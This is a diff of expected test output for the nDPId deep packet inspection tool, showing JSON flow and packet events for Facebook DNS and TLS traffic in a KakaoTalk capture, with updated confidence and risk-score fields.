 00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":75,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":21,"flow_packet_id":1,"flow_last_seen":1430069030508,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":76,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":76,"pkt_l4_len":40,"ts_msec":1430069030508,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAADz6+UAAPwaAjQoYUrwfDURUkrEAUI6+8f0AAAAAoAI5CDAyAAACBAV4BAIICgALCwQAAAAAAQMDBw=="}
 00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":77,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":21,"flow_packet_id":2,"flow_last_seen":1430069030549,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":60,"pkt_l4_len":24,"ts_msec":1430069030549,"pkt":"AAACEgAAAAAAAAAAAAAIAEUAACy6BkAA+AYIkB8NRFQKGFK8AFCSsWQ58S+OvvH+YBIRHF3ZAAACBAV4"}
@@ -102,50 +102,50 @@
 00490{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":79,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":22,"flow_packet_id":1,"flow_last_seen":1430069030557,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":83,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":83,"pkt_l4_len":47,"ts_msec":1430069030557,"pkt":"AAACEgAAAAAAAAAAAAAIAEUAAEMbkEAAjgYQ+x8NREkKGFK8Abu3n2dAc1oKhoE3UBigBOCLAAAVAwEAFgdiLTjhEFi+7He1g59CCs5hRzaz7rI="}
 00454{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":80,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":22,"flow_packet_id":2,"flow_last_seen":1430069030557,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":56,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":56,"pkt_l4_len":20,"ts_msec":1430069030557,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAACgOyEAAQAZr3goYUrwfDURJt58BuwqGgTdnQHN1UBBuKMBEAAA="}
 00455{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":81,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":22,"flow_packet_id":3,"flow_last_seen":1430069030557,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":56,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":56,"pkt_l4_len":20,"ts_msec":1430069030557,"pkt":"AAACEgAAAAAAAAAAAAAIAEUAACgbkUAAjgYRFR8NREkKGFK8Abu3n2dAc3UKhoE3UBGgBC\/XAAA="}
-00817{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":86,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1430069030508,"flow_last_seen":1430069030600,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":187,"flow_tot_l4_payload_len":187,"flow_avg_l4_payload_len":46,"midstream":0,"ts_msec":1430069030600,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"31.13.68.84","src_port":37553,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP.Facebook","breed":"Fun","category":"SocialNetwork"},"http": {"hostname":"www.facebook.com","url":"www.facebook.com\/mobile\/status.php","code":0,"content_type":"","user_agent":"Dalvik\/1.6.0 (Linux; U; Android 4.4.4; MI 3W MIUI\/V6.4.3.0.KXDMICB)"}}
+00843{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":86,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1430069030508,"flow_last_seen":1430069030600,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":187,"flow_tot_l4_payload_len":187,"flow_avg_l4_payload_len":46,"midstream":0,"ts_msec":1430069030600,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"31.13.68.84","src_port":37553,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Facebook","breed":"Fun","category":"SocialNetwork"},"http": {"hostname":"www.facebook.com","url":"www.facebook.com\/mobile\/status.php","code":0,"content_type":"","user_agent":"Dalvik\/1.6.0 (Linux; U; Android 4.4.4; MI 3W MIUI\/V6.4.3.0.KXDMICB)"}}
 00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":90,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069030703,"flow_last_seen":1430069030703,"flow_idle_time":180000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"ts_msec":1430069030703,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"10.188.1.1","src_port":24596,"dst_port":53,"l4_proto":"udp","flow_datalink":113,"flow_max_packets":3}
 00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":90,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":23,"flow_packet_id":1,"flow_last_seen":1430069030703,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":78,"pkt_l4_len":42,"ts_msec":1430069030703,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAAD4AAEAAQBHSHgoYUrwKvAEBYBQANQAqICQnwAEAAAEAAAAAAAADYXBpCGZhY2Vib29rA2NvbQAAAQAB"}
-00748{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":90,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069030703,"flow_last_seen":1430069030703,"flow_idle_time":180000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"ts_msec":1430069030703,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"10.188.1.1","src_port":24596,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS.Facebook","breed":"Fun","category":"SocialNetwork"},"dns": {"query":"api.facebook.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
-00898{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":91,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":11,"flow_first_seen":1430069026370,"flow_last_seen":1430069030731,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1280,"flow_tot_l4_payload_len":1648,"flow_avg_l4_payload_len":149,"midstream":0,"ts_msec":1430069030731,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"173.252.97.2","src_port":35503,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7":"Obsolete TLS version (older than 1.2)"},"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"dff8a0aa1c904aaea76c5bf624e88333","ja3s":"6c13ac74a6f75099ef2480748e5d94d2","unsafe_cipher":0,"cipher":"TLS_ECDHE_ECDSA_WITH_RC4_128_SHA"}}
-01687{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":95,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":15,"flow_first_seen":1430069026370,"flow_last_seen":1430069030740,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1280,"flow_tot_l4_payload_len":3915,"flow_avg_l4_payload_len":261,"midstream":0,"ts_msec":1430069030740,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"173.252.97.2","src_port":35503,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7":"Obsolete TLS version (older than 1.2)"},"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1","client_requested_server_name":"","server_names":"*.facebook.com,facebook.com,*.fbsbx.com,*.fbcdn.net,*.xx.fbcdn.net,*.xy.fbcdn.net,fb.com,*.fb.com,*.facebookcorewwwi.onion,facebookcorewwwi.onion,*.fbcdn23dssr3jqnq.onion,fbcdn23dssr3jqnq.onion,*.fbsbx2q4mvcl63pw.onion,fbsbx2q4mvcl63pw.onion,*.m.facebook.com,*.messenger.com,messenger.com,*.m.facebookcorewwwi.onion,*.xx.fbcdn23dssr3jqnq.onion,xx.fbcdn23dssr3jqnq.onion,*.xy.fbcdn23dssr3jqnq.onion,xy.fbcdn23dssr3jqnq.onion,*.xz.fbcdn.net,xz.fbcdn.net,*.xz.fbcdn23dssr3jqnq.onion,xz.fbcdn23dssr3jqnq.onion,m.facebookcorewwwi.onion","ja3":"dff8a0aa1c904aaea76c5bf624e88333","ja3s":"6c13ac74a6f75099ef2480748e5d94d2","unsafe_cipher":0,"cipher":"TLS_ECDHE_ECDSA_WITH_RC4_128_SHA","issuerDN":"C=US, O=DigiCert Inc, OU=www.digicert.com, CN=DigiCert High Assurance CA-3","subjectDN":"C=US, ST=CA, L=Menlo Park, O=Facebook, Inc., CN=*.facebook.com","fingerprint":"A4:FB:65:F8:A1:57:FE:0D:C0:17:C1:B5:51:62:63:3A:18:73:A0:B4"}}
+00774{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":90,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069030703,"flow_last_seen":1430069030703,"flow_idle_time":180000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"ts_msec":1430069030703,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"10.188.1.1","src_port":24596,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Facebook","breed":"Fun","category":"SocialNetwork"},"dns": {"query":"api.facebook.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
+01003{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":91,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":11,"flow_first_seen":1430069026370,"flow_last_seen":1430069030731,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1280,"flow_tot_l4_payload_len":1648,"flow_avg_l4_payload_len":149,"midstream":0,"ts_msec":1430069030731,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"173.252.97.2","src_port":35503,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"dff8a0aa1c904aaea76c5bf624e88333","ja3s":"6c13ac74a6f75099ef2480748e5d94d2","unsafe_cipher":0,"cipher":"TLS_ECDHE_ECDSA_WITH_RC4_128_SHA"}}
+01792{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":95,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":15,"flow_first_seen":1430069026370,"flow_last_seen":1430069030740,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1280,"flow_tot_l4_payload_len":3915,"flow_avg_l4_payload_len":261,"midstream":0,"ts_msec":1430069030740,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"173.252.97.2","src_port":35503,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1","client_requested_server_name":"","server_names":"*.facebook.com,facebook.com,*.fbsbx.com,*.fbcdn.net,*.xx.fbcdn.net,*.xy.fbcdn.net,fb.com,*.fb.com,*.facebookcorewwwi.onion,facebookcorewwwi.onion,*.fbcdn23dssr3jqnq.onion,fbcdn23dssr3jqnq.onion,*.fbsbx2q4mvcl63pw.onion,fbsbx2q4mvcl63pw.onion,*.m.facebook.com,*.messenger.com,messenger.com,*.m.facebookcorewwwi.onion,*.xx.fbcdn23dssr3jqnq.onion,xx.fbcdn23dssr3jqnq.onion,*.xy.fbcdn23dssr3jqnq.onion,xy.fbcdn23dssr3jqnq.onion,*.xz.fbcdn.net,xz.fbcdn.net,*.xz.fbcdn23dssr3jqnq.onion,xz.fbcdn23dssr3jqnq.onion,m.facebookcorewwwi.onion","ja3":"dff8a0aa1c904aaea76c5bf624e88333","ja3s":"6c13ac74a6f75099ef2480748e5d94d2","unsafe_cipher":0,"cipher":"TLS_ECDHE_ECDSA_WITH_RC4_128_SHA","issuerDN":"C=US, O=DigiCert Inc, OU=www.digicert.com, CN=DigiCert High Assurance CA-3","subjectDN":"C=US, ST=CA, L=Menlo Park, O=Facebook, Inc., CN=*.facebook.com","fingerprint":"A4:FB:65:F8:A1:57:FE:0D:C0:17:C1:B5:51:62:63:3A:18:73:A0:B4"}}
 00539{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":98,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":23,"flow_packet_id":2,"flow_last_seen":1430069030748,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":118,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":118,"pkt_l4_len":82,"ts_msec":1430069030748,"pkt":"AAACEgAAAAAAAAAAAAAIAEUAAGbtpgAANREvUAq8AQEKGFK8ADVgFABSeRsnwIGAAAEAAgAAAAADYXBpCGZhY2Vib29rA2NvbQAAAQABwAwABQABAAAD6wAMBHN0YXIEYzEwcsAQwC4AAQABAAAACQAEHw1EVA=="}
-00761{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":98,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1430069030703,"flow_last_seen":1430069030748,"flow_idle_time":180000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":74,"flow_tot_l4_payload_len":108,"flow_avg_l4_payload_len":54,"midstream":0,"ts_msec":1430069030748,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"10.188.1.1","src_port":24596,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS.Facebook","breed":"Fun","category":"SocialNetwork"},"dns": {"query":"api.facebook.com","num_queries":1,"num_answers":2,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"31.13.68.84"}}
+00787{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":98,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1430069030703,"flow_last_seen":1430069030748,"flow_idle_time":180000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":74,"flow_tot_l4_payload_len":108,"flow_avg_l4_payload_len":54,"midstream":0,"ts_msec":1430069030748,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"10.188.1.1","src_port":24596,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Facebook","breed":"Fun","category":"SocialNetwork"},"dns": {"query":"api.facebook.com","num_queries":1,"num_answers":2,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"31.13.68.84"}}
 00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":99,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069030751,"flow_last_seen":1430069030751,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1430069030751,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"31.13.68.84","src_port":45209,"dst_port":443,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3}
 00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":99,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":24,"flow_packet_id":1,"flow_last_seen":1430069030751,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":76,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":76,"pkt_l4_len":40,"ts_msec":1430069030751,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAADwzN0AAPwZIUAoYUrwfDURUsJkBu9qbOCoAAAAAoAI5CH68AAACBAV4BAIICgALCx0AAAAAAQMDBw=="}
 00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":101,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":24,"flow_packet_id":2,"flow_last_seen":1430069030835,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":76,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":76,"pkt_l4_len":40,"ts_msec":1430069030835,"pkt":"AAACEgAAAAAAAAAAAAAIAEUAADwAAEAAjgYshx8NRFQKGFK8AbuwmcDC6aramzgroBKpsCsUAAACBAV4BAIICqKRlfAACwsdAQMDBg=="}
 00471{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":102,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":24,"flow_packet_id":3,"flow_last_seen":1430069030839,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":68,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":68,"pkt_l4_len":32,"ts_msec":1430069030839,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAADQzOEAAPwZIVwoYUrwfDURUsJkBu9qbOCvAwumrgBAAcwLZAAABAQgKAAsLJaKRlfA="}
-00861{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":103,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1430069030751,"flow_last_seen":1430069030840,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":563,"flow_tot_l4_payload_len":563,"flow_avg_l4_payload_len":140,"midstream":0,"ts_msec":1430069030840,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"31.13.68.84","src_port":45209,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15":"TLS (probably) not carrying HTTPS"},"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"api.facebook.com","ja3":"051d20e8adbe8dac78945de300764d5e","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}}
+00967{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":103,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1430069030751,"flow_last_seen":1430069030840,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":563,"flow_tot_l4_payload_len":563,"flow_avg_l4_payload_len":140,"midstream":0,"ts_msec":1430069030840,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"31.13.68.84","src_port":45209,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"api.facebook.com","ja3":"051d20e8adbe8dac78945de300764d5e","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":109,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069030978,"flow_last_seen":1430069030978,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"ts_msec":1430069030978,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"10.188.1.1","src_port":19582,"dst_port":53,"l4_proto":"udp","flow_datalink":113,"flow_max_packets":3}
 00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":109,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":25,"flow_packet_id":1,"flow_last_seen":1430069030978,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":80,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":80,"pkt_l4_len":44,"ts_msec":1430069030978,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAAEAAAEAAQBHSHAoYUrwKvAEBTH4ANQAsPIiqhwEAAAEAAAAAAAAFZ3JhcGgIZmFjZWJvb2sDY29tAAABAAE="}
-00751{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":109,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069030978,"flow_last_seen":1430069030978,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"ts_msec":1430069030978,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"10.188.1.1","src_port":19582,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS.Facebook","breed":"Fun","category":"SocialNetwork"},"dns": {"query":"graph.facebook.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
-00919{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":111,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1430069030751,"flow_last_seen":1430069031001,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":1951,"flow_avg_l4_payload_len":325,"midstream":0,"ts_msec":1430069031001,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"31.13.68.84","src_port":45209,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15":"TLS (probably) not carrying HTTPS"},"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"api.facebook.com","ja3":"051d20e8adbe8dac78945de300764d5e","ja3s":"6806b8fe92d7d465715d771eb102ff04","unsafe_cipher":0,"cipher":"TLS_ECDHE_ECDSA_WITH_AES_128_GCM_SHA256"}}
-01709{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":115,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1430069030751,"flow_last_seen":1430069031013,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":4134,"flow_avg_l4_payload_len":413,"midstream":0,"ts_msec":1430069031013,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"31.13.68.84","src_port":45209,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15":"TLS (probably) not carrying HTTPS"},"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"api.facebook.com","server_names":"*.facebook.com,facebook.com,*.fbsbx.com,*.fbcdn.net,*.xx.fbcdn.net,*.xy.fbcdn.net,fb.com,*.fb.com,*.facebookcorewwwi.onion,facebookcorewwwi.onion,*.fbcdn23dssr3jqnq.onion,fbcdn23dssr3jqnq.onion,*.fbsbx2q4mvcl63pw.onion,fbsbx2q4mvcl63pw.onion,*.m.facebook.com,*.messenger.com,messenger.com,*.m.facebookcorewwwi.onion,*.xx.fbcdn23dssr3jqnq.onion,xx.fbcdn23dssr3jqnq.onion,*.xy.fbcdn23dssr3jqnq.onion,xy.fbcdn23dssr3jqnq.onion,*.xz.fbcdn.net,xz.fbcdn.net,*.xz.fbcdn23dssr3jqnq.onion,xz.fbcdn23dssr3jqnq.onion,m.facebookcorewwwi.onion","ja3":"051d20e8adbe8dac78945de300764d5e","ja3s":"6806b8fe92d7d465715d771eb102ff04","unsafe_cipher":0,"cipher":"TLS_ECDHE_ECDSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=DigiCert Inc, OU=www.digicert.com, CN=DigiCert High Assurance CA-3","subjectDN":"C=US, ST=CA, L=Menlo Park, O=Facebook, Inc., CN=*.facebook.com","fingerprint":"A4:FB:65:F8:A1:57:FE:0D:C0:17:C1:B5:51:62:63:3A:18:73:A0:B4"}}
+00777{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":109,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069030978,"flow_last_seen":1430069030978,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"ts_msec":1430069030978,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"10.188.1.1","src_port":19582,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Facebook","breed":"Fun","category":"SocialNetwork"},"dns": {"query":"graph.facebook.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
+01025{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":111,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1430069030751,"flow_last_seen":1430069031001,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":1951,"flow_avg_l4_payload_len":325,"midstream":0,"ts_msec":1430069031001,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"31.13.68.84","src_port":45209,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"api.facebook.com","ja3":"051d20e8adbe8dac78945de300764d5e","ja3s":"6806b8fe92d7d465715d771eb102ff04","unsafe_cipher":0,"cipher":"TLS_ECDHE_ECDSA_WITH_AES_128_GCM_SHA256"}}
+01815{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":115,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1430069030751,"flow_last_seen":1430069031013,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":4134,"flow_avg_l4_payload_len":413,"midstream":0,"ts_msec":1430069031013,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"31.13.68.84","src_port":45209,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"},"tls": 